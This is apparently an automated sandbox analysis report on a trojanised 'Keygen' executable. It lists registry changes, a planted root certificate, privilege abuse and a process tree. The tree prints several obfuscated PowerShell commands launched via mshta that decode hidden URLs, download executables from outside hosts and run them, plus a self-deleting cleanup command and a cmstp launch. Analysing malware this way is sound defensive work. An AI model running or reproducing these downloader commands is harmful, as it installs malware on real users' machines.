Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchUI.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 4120 reg.exe 4392 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 FcIiEO8Bol.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e FcIiEO8Bol.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4088 powershell.exe 4088 powershell.exe 1528 powershell.exe 1528 powershell.exe 3608 powershell.exe 3608 powershell.exe 3712 powershell.exe 3712 powershell.exe 2284 powershell.exe 2284 powershell.exe 2168 powershell.exe 2168 powershell.exe 2284 powershell.exe 2168 powershell.exe 3712 powershell.exe 3608 powershell.exe 4088 powershell.exe 1528 powershell.exe 3712 powershell.exe 2284 powershell.exe 1528 powershell.exe 3608 powershell.exe 2168 powershell.exe 4088 powershell.exe 3560 3glqQ5zu6q.exe 3560 3glqQ5zu6q.exe 3560 3glqQ5zu6q.exe 3560 3glqQ5zu6q.exe 3764 Zfog5KVMBE.exe 3764 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 6088 explorer.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5024 mkx.exe 4468 zVhjgfutyFD.exe 4476 HuytgfGDFwer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3608 powershell.exe Token: SeDebugPrivilege 4088 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 3712 powershell.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 2844 taskkill.exe Token: SeDebugPrivilege 3560 3glqQ5zu6q.exe Token: SeDebugPrivilege 3764 Zfog5KVMBE.exe Token: SeDebugPrivilege 2424 Zfog5KVMBE.exe Token: SeDebugPrivilege 4004 SmMNW0P9JH.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 956 taskkill.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeIncreaseQuotaPrivilege 4780 powershell.exe Token: SeSecurityPrivilege 4780 powershell.exe Token: SeTakeOwnershipPrivilege 4780 powershell.exe Token: SeLoadDriverPrivilege 4780 powershell.exe Token: SeSystemProfilePrivilege 4780 powershell.exe Token: SeSystemtimePrivilege 4780 powershell.exe Token: SeProfSingleProcessPrivilege 4780 powershell.exe Token: SeIncBasePriorityPrivilege 4780 powershell.exe Token: SeCreatePagefilePrivilege 4780 powershell.exe Token: SeBackupPrivilege 4780 powershell.exe Token: SeRestorePrivilege 4780 powershell.exe Token: SeShutdownPrivilege 4780 powershell.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeSystemEnvironmentPrivilege 4780 powershell.exe Token: SeRemoteShutdownPrivilege 4780 powershell.exe Token: SeUndockPrivilege 4780 powershell.exe Token: SeManageVolumePrivilege 4780 powershell.exe Token: 33 4780 powershell.exe Token: 34 4780 powershell.exe Token: 35 4780 powershell.exe Token: 36 4780 powershell.exe Token: SeDebugPrivilege 4580 powershell.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 488 powershell.exe Token: SeDebugPrivilege 508 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 3948 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeIncreaseQuotaPrivilege 2480 powershell.exe Token: SeSecurityPrivilege 2480 powershell.exe Token: SeTakeOwnershipPrivilege 2480 powershell.exe Token: SeLoadDriverPrivilege 2480 powershell.exe Token: SeSystemProfilePrivilege 2480 powershell.exe Token: SeSystemtimePrivilege 2480 powershell.exe Token: SeProfSingleProcessPrivilege 2480 powershell.exe Token: SeIncBasePriorityPrivilege 2480 powershell.exe Token: SeCreatePagefilePrivilege 2480 powershell.exe Token: SeBackupPrivilege 2480 powershell.exe Token: SeRestorePrivilege 2480 powershell.exe Token: SeShutdownPrivilege 2480 powershell.exe Token: SeDebugPrivilege 2480 powershell.exe Token: SeSystemEnvironmentPrivilege 2480 powershell.exe Token: SeRemoteShutdownPrivilege 2480 powershell.exe Token: SeUndockPrivilege 2480 powershell.exe Token: SeManageVolumePrivilege 2480 powershell.exe -
Suspicious use of FindShellTrayWindow 49 IoCs
pid Process 504 Keygen.exe 504 Keygen.exe 504 Keygen.exe 504 Keygen.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe -
Suspicious use of SendNotifyMessage 38 IoCs
pid Process 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe 6088 explorer.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 504 Keygen.exe 5024 mkx.exe 5104 pvr.exe 4468 zVhjgfutyFD.exe 4476 HuytgfGDFwer.exe 2424 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 2240 SearchUI.exe 5800 ShellExperienceHost.exe 5800 ShellExperienceHost.exe 3432 tdwmwhz8zi.exe 3432 tdwmwhz8zi.exe 356 SearchUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 732 wrote to memory of 2744 732 Keygen.bin.exe 75 PID 732 wrote to memory of 2744 732 Keygen.bin.exe 75 PID 732 wrote to memory of 2744 732 Keygen.bin.exe 75 PID 2744 wrote to memory of 504 2744 cmd.exe 78 PID 2744 wrote to memory of 504 2744 cmd.exe 78 PID 2744 wrote to memory of 504 2744 cmd.exe 78 PID 2744 wrote to memory of 2276 2744 cmd.exe 79 PID 2744 wrote to memory of 2276 2744 cmd.exe 79 PID 2744 wrote to memory of 2276 2744 cmd.exe 79 PID 2744 wrote to memory of 920 2744 cmd.exe 80 PID 2744 wrote to memory of 920 2744 cmd.exe 80 PID 2744 wrote to memory of 920 2744 cmd.exe 80 PID 2744 wrote to memory of 1436 2744 cmd.exe 81 PID 2744 wrote to memory of 1436 2744 cmd.exe 81 PID 2744 wrote to memory of 1436 2744 cmd.exe 81 PID 2744 wrote to memory of 2224 2744 cmd.exe 82 PID 2744 wrote to memory of 2224 2744 cmd.exe 82 PID 2744 wrote to memory of 2224 2744 cmd.exe 82 PID 2744 wrote to memory of 1092 2744 cmd.exe 83 PID 2744 wrote to memory of 1092 2744 cmd.exe 83 PID 2744 wrote to memory of 1092 2744 cmd.exe 83 PID 2744 wrote to memory of 3680 2744 cmd.exe 84 PID 2744 wrote to memory of 3680 2744 cmd.exe 84 PID 2744 wrote to memory of 3680 2744 cmd.exe 84 PID 2744 wrote to memory of 1904 2744 cmd.exe 85 PID 2744 wrote to memory of 1904 2744 cmd.exe 85 PID 2744 wrote to memory of 1904 2744 cmd.exe 85 PID 2744 wrote to memory of 584 2744 cmd.exe 86 PID 2744 wrote to memory of 584 2744 cmd.exe 86 PID 2744 wrote to memory of 584 2744 cmd.exe 86 PID 584 wrote to memory of 3712 584 mshta.exe 87 PID 920 wrote to memory of 2168 920 mshta.exe 88 PID 584 wrote to memory of 3712 584 mshta.exe 87 PID 584 wrote to memory of 3712 584 mshta.exe 87 PID 920 wrote to memory of 2168 920 mshta.exe 88 PID 920 wrote to memory of 2168 920 mshta.exe 88 PID 2276 wrote to memory of 1528 2276 mshta.exe 89 PID 2276 wrote to memory of 1528 2276 mshta.exe 89 PID 2276 wrote to memory of 1528 2276 mshta.exe 89 PID 2224 wrote to memory of 3608 2224 mshta.exe 90 PID 2224 wrote to memory of 3608 2224 mshta.exe 90 PID 2224 wrote to memory of 3608 2224 mshta.exe 90 PID 1904 wrote to memory of 4088 1904 mshta.exe 91 PID 1904 wrote to memory of 4088 1904 mshta.exe 91 PID 1904 wrote to memory of 4088 1904 mshta.exe 91 PID 1092 wrote to memory of 2284 1092 mshta.exe 92 PID 1092 wrote to memory of 2284 1092 mshta.exe 92 PID 1092 wrote to memory of 2284 1092 mshta.exe 92 PID 4088 wrote to memory of 5024 4088 powershell.exe 99 PID 4088 wrote to memory of 5024 4088 powershell.exe 99 PID 4088 wrote to memory of 5024 4088 powershell.exe 99 PID 1528 wrote to memory of 5104 1528 powershell.exe 100 PID 1528 wrote to memory of 5104 1528 powershell.exe 100 PID 1528 wrote to memory of 5104 1528 powershell.exe 100 PID 3608 wrote to memory of 5116 3608 powershell.exe 101 PID 3608 wrote to memory of 5116 3608 powershell.exe 101 PID 3608 wrote to memory of 5116 3608 powershell.exe 101 PID 5024 wrote to memory of 4468 5024 mkx.exe 102 PID 5024 wrote to memory of 4468 5024 mkx.exe 102 PID 5024 wrote to memory of 4468 5024 mkx.exe 102 PID 5024 wrote to memory of 4476 5024 mkx.exe 103 PID 5024 wrote to memory of 4476 5024 mkx.exe 103 PID 5024 wrote to memory of 4476 5024 mkx.exe 103 PID 5024 wrote to memory of 4272 5024 mkx.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\790E.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\790E.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:504
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Users\Public\pvr.exe"C:\Users\Public\pvr.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5104
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:1436
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Users\Public\txi.exe"C:\Users\Public\txi.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5116 -
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5500 -
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5044 & erase C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe & RD /S /Q C:\\ProgramData\\135572298009183\\* & exit9⤵PID:4112
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 504410⤵
- Kills process with taskkill
PID:4908
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"{path}"7⤵
- Executes dropped EXE
PID:3100
-
-
-
C:\Users\Public\txi.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:5520 -
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"8⤵
- Executes dropped EXE
PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe"C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe"7⤵
- Executes dropped EXE
PID:5868 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵PID:3172
-
-
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4776 -
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
PID:6048
-
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
PID:4512
-
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3432 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\hazyeme1.inf9⤵PID:5472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6000 -
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:6040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵PID:3436
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\txi.exe"7⤵PID:5584
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:3428
-
-
-
-
-
-
-
